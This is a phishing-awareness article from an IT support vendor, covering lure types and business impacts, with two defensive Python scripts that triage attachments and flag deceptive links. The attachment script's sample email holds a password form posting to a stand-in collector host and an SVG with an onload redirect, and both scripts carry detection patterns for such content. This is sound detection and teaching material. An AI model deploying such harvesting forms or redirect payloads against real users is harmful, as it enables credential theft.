
Recent data indicates that nearly three quarters of organizations around the world experienced a phishing attack in 2020. More worrying still, 74% of attacks targeting US businesses were successful. According to a study by APWG, webmail and Software-as-a-Service (SaaS) users were the worst affected, with 34.7% of phishing attacks targeted at them. Google Safe Browsing data indicates that there are now nearly 75 times as many phishing sites as malware sites on the Internet. All of which points to the fact that phishing attacks are not going away anytime soon. Whether the victim is John Podesta, Hillary Clinton’s campaign manager, whose Gmail password was compromised; Walter Stephan, an Austrian aerospace executive, who was scammed out of $47 million; or Target, whose breach affected 110 million customers, the wealth of phishing attack examples shows that they can happen to anyone at any time. The only way for businesses to stay safe from phishing attacks is to prevent them from happening in the first place. IT Support Vermont can be a great resource to start protecting your business from phishing attacks.

What is Phishing?

Phishing is a cyberattack that tries to trick users into acting on a fraudulent message, compromising themselves and the organizations they work for. The message can arrive through a wide range of delivery methods, email being by far the most popular. Phishing attempts may aim to get users to click on malicious links or open malicious attachments, to enter sensitive information (credentials, personally identifiable information, financial information and more) on spoofed websites, and so on. This form of attack is notorious for impersonating the most commonplace and trusted sources: an email, message or call purporting to come from the victim’s bank or social media provider, or an attachment apparently sent by a colleague or a senior business leader. Some phishing attacks are so sophisticated that it takes the trained eye of a cyber security professional to tell a genuine message from a trusted source apart from the phishing email or spoofed website. Email phishing is by far the most common form: 96% of social engineering attacks are delivered by email, 3% through a website, and 1% by phone or SMS communications and malicious documents.

Most common forms of phishing attacks include:

Tech Support Scams

As cyber-attacks have become more prevalent, it has become common for technical support teams to email users whenever they notice unusual activity on an account. Attackers take advantage of this by sending spoofed emails that appear to contain emergency alerts. Users are bound to pay attention to alerts of this kind and often click through without looking closely. One way of staying safe from technical support scams is to hover over the link (or check the phone number) you are being directed to and confirm that the destination is genuine: the address revealed on hover is where the browser will actually go, whatever the visible text says. Users should also pay close attention to the sender address and the grammatical accuracy of the message.

Infected Attachments

Malicious .HTML attachments are not reliably detected by antivirus solutions, since .HTML files have not traditionally been treated as a common threat source. At the same time, HTML attachments are routinely used by banks and other financial institutions (for secure statements and notices, for example), so recipients are accustomed to opening them. That makes them a highly effective attack delivery mechanism: the attachment can carry a login form that posts credentials to the attacker, or script that redirects the browser to a spoofed site.

Macros with Payloads

Malicious macros in Office documents attached to phishing emails are a very common way of delivering ransomware. They are also capable of flying under the radar of anti-virus programs, since the macro itself is often only a small downloader for the real payload. The accompanying message generally claims to be highly urgent and urges the user to open the document (and enable macros) immediately.

Social Media Exploits

Social media platforms such as Facebook and Instagram are often used by attackers to deliver malicious messages straight to the user’s inbox. It is easy for an attacker to pose as someone the victim knows, and the messages often contain links or a single .SVG (Scalable Vector Graphics) image file, a format that has been used to bypass Facebook’s file extension filter because an SVG can carry embedded JavaScript. The bait is often a piece of viral media content (a video or image) or an alert about unusual activity on the victim’s account. When users click, they are redirected to malicious links or spoofed pages where they are asked to install a seemingly harmless piece of additional software (such as a browser extension) to view the content. Once installed, a malicious extension can be used to hijack the user’s Facebook account. In some attacks, the embedded JavaScript can also trigger a trojan downloader that delivers further malicious payloads. Attackers also scrape social media accounts in order to launch spear phishing attacks.
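To make the three attachment lures above concrete (HTML files carrying a login form, macro-enabled Office documents, and SVG images carrying script), here is an added triage script written for this article; it is not code from the original page or from any product. It builds a constructed sample email in memory (the sender, recipient, filenames and the collector and lure hostnames are all made-up example values) and then inspects each attachment the way a mail gateway or an analyst would: double extensions, active content types, forms posting to external hosts, password fields, script or event handlers in HTML/SVG, and a vbaProject.bin part inside an Office container.

```python
import email
import io
import re
import zipfile
from email import policy
from email.message import EmailMessage

# Extensions that execute code or render forms when opened; a recipient rarely has
# a legitimate reason to receive these as mail attachments.
ACTIVE_EXTENSIONS = {".html", ".htm", ".shtml", ".svg", ".docm", ".xlsm", ".pptm", ".js", ".hta"}
OOXML_EXTENSIONS = {".docx", ".docm", ".xlsx", ".xlsm", ".pptx", ".pptm"}

SCRIPT_RE = re.compile(rb"<script\b|\bon(load|error|click)\s*=|javascript:", re.I)
FORM_RE = re.compile(rb"<form\b[^>]*action\s*=\s*['\"]?(https?://[^'\"\s>]+)", re.I)
CRED_RE = re.compile(rb"type\s*=\s*['\"]?password", re.I)


def _extensions(filename):
    # "statement.pdf.html" -> [".pdf", ".html"]; a double extension is a classic lure.
    parts = filename.lower().split(".")
    return ["." + p for p in parts[1:]]


def _ooxml_has_macros(data):
    # Macro-enabled Office documents are zip containers holding a vbaProject.bin part.
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return any(name.lower().endswith("vbaproject.bin") for name in zf.namelist())
    except zipfile.BadZipFile:
        return False


def triage_attachments(raw_message):
    """Return {filename: [reasons]} for every attachment that deserves a closer look."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    findings = {}
    for part in msg.iter_attachments():
        name = part.get_filename() or "(unnamed)"
        data = part.get_payload(decode=True) or b""
        exts = _extensions(name)
        last = exts[-1] if exts else ""
        reasons = []
        if len(exts) > 1:
            reasons.append("double extension %s" % "".join(exts))
        if last in ACTIVE_EXTENSIONS:
            reasons.append("active content type %s" % last)
        if last in {".html", ".htm", ".shtml", ".svg"}:
            if SCRIPT_RE.search(data):
                reasons.append("embedded script/event handler")
            m = FORM_RE.search(data)
            if m:
                reasons.append("form posts to %s" % m.group(1).decode(errors="replace"))
            if CRED_RE.search(data):
                reasons.append("password field (credential harvesting)")
        if last in OOXML_EXTENSIONS and _ooxml_has_macros(data):
            reasons.append("VBA macro project inside Office document")
        if reasons:
            findings[name] = reasons
    return findings


def build_sample_message():
    """Constructed phishing-style email with four attachments (sample data, not a real capture)."""
    msg = EmailMessage()
    msg["From"] = "alerts@example-bank.invalid"   # made-up sender
    msg["To"] = "victim@example.com"
    msg["Subject"] = "Your secure statement"
    msg.set_content("Please open the attached secure statement.")
    # "Secure statement" that is really a credential-harvesting form posting to a made-up collector host
    html = (b"<html><body><form action='https://collector.example.net/login' method='post'>"
            b"Password: <input type='password' name='pw'></form></body></html>")
    msg.add_attachment(html, maintype="text", subtype="html", filename="statement.pdf.html")
    # SVG whose onload handler redirects the viewer to a made-up lure host
    svg = b"<svg xmlns='http://www.w3.org/2000/svg' onload=\"location='https://lure.example.net'\"></svg>"
    msg.add_attachment(svg, maintype="image", subtype="svg+xml", filename="funny.svg")
    # Minimal zip container shaped like a macro-enabled Word document (placeholder VBA bytes)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/vbaProject.bin", b"\x00" * 16)
    msg.add_attachment(buf.getvalue(), maintype="application",
                       subtype="vnd.ms-word.document.macroEnabled.12", filename="invoice.docm")
    # Benign plain-text attachment for comparison; it should produce no findings
    msg.add_attachment(b"hello", maintype="text", subtype="plain", filename="notes.txt")
    return msg.as_bytes()


if __name__ == "__main__":
    for filename, reasons in triage_attachments(build_sample_message()).items():
        print(filename, "->", "; ".join(reasons))
```

The extension checks alone would already catch all three lures; the content checks matter for the case where an attacker renames the file, which is why the Office check looks inside the zip for the VBA part rather than trusting the .docm suffix.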

LinkedIn Phishing Attacks

The wealth of personal and professional information shared on LinkedIn makes it a lucrative target for phishing attacks. Attackers can mine that data to choose potential victims and carefully tailor social engineering tactics to launch business email compromise attacks, including wire transfer and W-2 social engineering scams, credential scams and more.

CEO Fraud Scams

These attacks are becoming increasingly common: employees are sent emails that appear to come from a senior business leader, often the CEO, CFO or CTO. Because messages of this kind tend to get immediate attention and action, users can be duped into acting faster (and with less caution) than they otherwise would.

IT Outsourcing Vermont can help you shore up your business’ defenses from all kinds of phishing attacks.

How do phishing attacks work?

Phishing exploits the generally trusting nature of people, and their distraction, in order to elicit a response. The worst attacks can hardly be distinguished from an actual message from a trusted entity (or person) that the victim is likely to transact with. The dark web is full of ready-to-use phishing kits that can be deployed by attackers with negligible technical skills.

Phishing attack prevention is not impossible. Companies need to prioritize employee cybersecurity education so that staff can identify phishing attacks, install advanced security solutions, and implement policies that effectively block phishing attempts and protect the business. It also requires users to pay close attention. For instance, users should always examine hypertext links in any email client before clicking. Hover over hyperlinks and anchor text to check that the destination URL matches the one shown in the email; be wary of shortened links, links whose host is a bare IP address, and links with strange characters.
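The hover-and-compare check recommended under Tech Support Scams and again here can be automated over an email’s HTML body. The following Python script is an added example written for this article, not code from the original page; the email body it analyses is constructed, and every hostname in it is fictional (example-bank.com, lure.example.org, the 198.51.100.23 documentation address, and so on). It collects each anchor’s href alongside its visible text, which is exactly what a hover reveals, and flags the mismatches and oddities the text warns about: visible text naming one domain while the link goes to another, bare IP addresses, punycode hosts, URL shorteners, and a user-info section before the ‘@’ that makes the real host easy to miss.

```python
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hosts that hide the real destination behind a redirect (illustrative list, not exhaustive).
SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "goo.gl", "ow.ly", "is.gd"}
# A domain or URL written out in the visible anchor text.
DOMAIN_IN_TEXT = re.compile(r"(?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})", re.I)


class _AnchorCollector(HTMLParser):
    """Collects (href, visible text) pairs, i.e. what a mouse hover would reveal."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        href = dict(attrs).get("href")
        if tag == "a" and href is not None:
            self._href = href
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registered_domain(host):
    """Crude registrable-domain guess: the last two labels. Fine for the demo;
    production code should consult the Public Suffix List (co.uk, com.au, ...)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def _is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def analyse_link(href, text):
    """Return the red flags for one anchor; an empty list means nothing stood out."""
    flags = []
    parts = urlsplit(href.strip())
    host = parts.hostname or ""
    if parts.scheme not in ("http", "https"):
        return ["non-web scheme %r" % (parts.scheme or "none")]
    if parts.username is not None:
        # https://example-bank.com@lure.example.org/ connects to lure.example.org
        flags.append("userinfo before host: browser ignores '%s@' and connects to %s" % (parts.username, host))
    if _is_ip(host):
        flags.append("host is a bare IP address")
    if any(label.startswith("xn--") for label in host.split(".")):
        flags.append("punycode host (possible homoglyph domain)")
    if registered_domain(host) in SHORTENERS:
        flags.append("URL shortener hides the real destination")
    m = DOMAIN_IN_TEXT.search(text)
    if m and registered_domain(m.group(1)) != registered_domain(host):
        flags.append("visible text says %s but link goes to %s" % (m.group(1), host))
    return flags


def suspicious_links(html):
    """Return [(href, visible_text, [flags])] for every anchor with at least one flag."""
    parser = _AnchorCollector()
    parser.feed(html)
    results = []
    for href, text in parser.links:
        flags = analyse_link(href, text)
        if flags:
            results.append((href, text, flags))
    return results


# Constructed email body; all hosts are fictional.
SAMPLE_EMAIL_HTML = """<p>We noticed unusual activity on your account.</p>
<p>Please <a href="https://example-bank.com.verify-login.example.net/secure">sign in at https://example-bank.com</a> to confirm.</p>
<p>Or call support via <a href="http://198.51.100.23/help">our help desk</a>.</p>
<p>Details: <a href="https://bit.ly/3xAmpLe">view details</a></p>
<p>Reference: <a href="https://example-bank.com@lure.example.org/">example-bank.com</a></p>
<p><a href="https://www.example-bank.com/">Privacy policy</a></p>
"""

if __name__ == "__main__":
    for href, text, flags in suspicious_links(SAMPLE_EMAIL_HTML):
        print("%-22s -> %s\n    %s" % (text, href, "; ".join(flags)))
```

Only the privacy-policy link survives: its host really is under example-bank.com and its text makes no claim about a domain. The first link is the pattern to train people on, because the genuine domain is right there in the host, just not where the browser looks for it.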

How can phishing affect a business?

Data Loss

Clicking on a malicious link in an email can render an entire organization’s network and data vulnerable. Attackers are then free to steal, modify, corrupt or delete data. They can hold the company to ransom and choose to sell or publicly disclose sensitive information. Sometimes the data loss is so severe that the company cannot survive the attack.

Reputation Damage

Data breaches affect the reputation of companies nearly as much as financial scandals or other such outrages. The loss of trust from consumers and shareholders alike can often be permanent and even trigger public backlashes.

Direct Monetary Loss

Any successful breach can lead to direct monetary loss. This is followed by a period of paying for mandatory analysis of the attack and for damages, including fines, compensation for affected customers or employees, identity protection services and more.

Productivity Loss

Data breaches also cause significant business disruption. The targeted organization is forced to spend time and resources recovering lost data, investigating the breach and managing the damage. With most business systems partially or completely offline, employee productivity takes a hit.

Loss of Customers

Data breaches and phishing attacks can scare customers away for good. Many simply refuse to associate with a business that has failed to protect its customers’ trust and data.

Financial Penalties

Violating regulatory requirements such as HIPAA, PCI DSS and the European GDPR can attract heavy fines. In addition, a breach of sensitive customer or employee data results in both compensation claims and heavy regulatory fines.

Intellectual Property Theft

Phishing attacks often target intellectual property, the loss of which can be more costly than the direct financial losses from the attack. This could include new technology and trade secrets that took years of heavy investment in research and development; losing it can leave the company less competitive.

Loss of Company Value

Loss of investor confidence following a breach can result in the evaporation of a company’s market value.

Steve Loyer

With over 25 years of sales and service experience in network and network security solutions, Steve has earned technical and sales certificates from Microsoft, Cisco, Hewlett Packard, Citrix, Sonicwall, Symantec, McAfee, Barracuda and American Power Conversion. Steve graduated from Vermont Technical College with a degree in Electrical and Electronics Engineering Technology.